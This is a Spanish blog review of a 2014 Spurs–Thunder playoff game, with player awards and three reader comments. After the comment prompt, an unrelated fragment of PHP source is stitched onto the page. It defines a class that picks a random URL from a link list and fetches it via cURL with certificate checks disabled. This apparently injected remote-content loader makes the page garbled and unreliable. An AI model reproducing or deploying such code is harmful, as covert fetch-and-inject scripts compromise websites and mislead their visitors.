La Crónica: Los chicos del coro

30 de May de 2014 por TheDeerHunter

“This is the craziest series I’ve ever been involved in”. Tim Duncan

Tremendo correctivo el que les infligieron los Spurs a los Thunder anoche en San Antonio. Palizón sin paliativos con 28 puntos de diferencia. Mediante el baloncesto preciosista al que nos tenían acostumbrado rompieron la mala racha que les había generado tanta ansiedad en Oklahoma y, aún más importante, se desembarazaron por fin del efecto Ibaka, quien les había ganado los 6 partidos que ha disputado esta temporada. Durant y Westbrook vuelven a estar contra las cuerdas.

El choque está plagado de detalles que acabarían inclinando la balanza. La primera fue la “ocurrencia” de Greg Popovich de salir con Bonner de titular. Si hubiera salido mal le hubieran caído unos cuantos palos. Lo cierto es que Matt Bonner no estuvo bien pero su presencia significó una clara voluntad de abrir el campo, algo que no vino nada bien a los interiores rivales. El resultado de la idea se vería mucho mejor con la entrada de Boris Diaw, quien cuajó una actuación casi perfecta. Es curioso que sean los Spurs quienes hayan “aligerado” esa presencia interior y no al revés, con unos resultados sorprendentemente buenos. No sólo subieron su efectividad en la pintura hasta el 71.4% (frente al 45% del anterior choque) sino que negaron en gran medida las letales penetraciones de Russell Westbrook.

La segunda clave, ésta mucho más esperada, fue la desigual producción de las segundas unidades. Los Spurs comenzaron a someter a los Thunder con la paulatina entrada de la segunda unidad al final del primer cuarto. El efecto en el segundo fue muy claro. Excelentes el mencionado Diaw, Manu Ginobili y Patty Mills, con Splitter saliendo desde el banco. La producción anotadora de los reservas tejanos fue de 55 puntos por 26 de la de sus rivales. Además, 4 de los titulares se fueron a las dobles figuras aunque sin alardes. Ante tal avalancha, anoche no valían las actuaciones mundanas de Durant y Westbrook, motivadas en buena parte por el descanso que Brooks les otorgó al final. En un mal partido de Ibaka sólo Jackson les echó una mano (89-117). 

Se ha dado la vuelta a la tortilla. Los Spurs no han logrado ganar en el Chesapeake aún pero el golpe moral y táctico ha sido muy gordo. Veremos si Scott Brooks tiene jugadas maestras a la altura del entrenador rival.

PREMIOS

MVP: A sus 38 años, Tim Duncan (22p – 12r) fue el mejor de los suyos una vez más. Sin Splitter en pista, el peso del juego interior cayó íntegramente sobre sus hombros y evidentemente no se arrugó.

Sorpresa: El francés Boris Diaw fue una de las claves del gran partido de los Spurs. Salió de titular en la 2ª parte y acabó con 13 puntos, 6 rebotes y 3 asistencias.

Decepción: Greg Popovich sacó a Matt Bonner de titular conun objetivo claro pero este no fue capaz de anotar ni una de las 4 canastas que intentó.

Esfuerzo en vano: La pareja de los Thunder volvió a tirar con más del 50% de acierto pero esta vez se quedaron “sólo” en 46 puntos.

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Duncan está a 3 partidos de igualar a Magic como jugador con mas dobles-dobles en la historia de los playoffs. Si no le pasa nada raro lo superará.

    Los Thunders necesitan partidos casi perfectos de Durant&Westbrook y una aportación grande de Ibaka y Jackson como mínimo para pelear la serie.

      Citar

  2. Ruxixon dice:
    #2

    Enorme Popo,partido ganado desde el análisis de los 2 partidos del Chesapeake,solicitando TO para frenar las arrancadas de Oklahoma y sentando cátedra en los comentarios que pudieron escucharse durante la retransmisión.

      Citar

  3. Lucho dice:
    #3

    Cole, Allen, Battier, Andersen, Haslem
    Se habla poco de la segunda unidad del Heat, pero es realmente buena

    Que buen jugador seria Lance Stephenson si lo agarrara Thibodeau (o Rivers o Pop)
    Donde ira? Seria posible a Chicago? Pregunto por salarios y demas

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>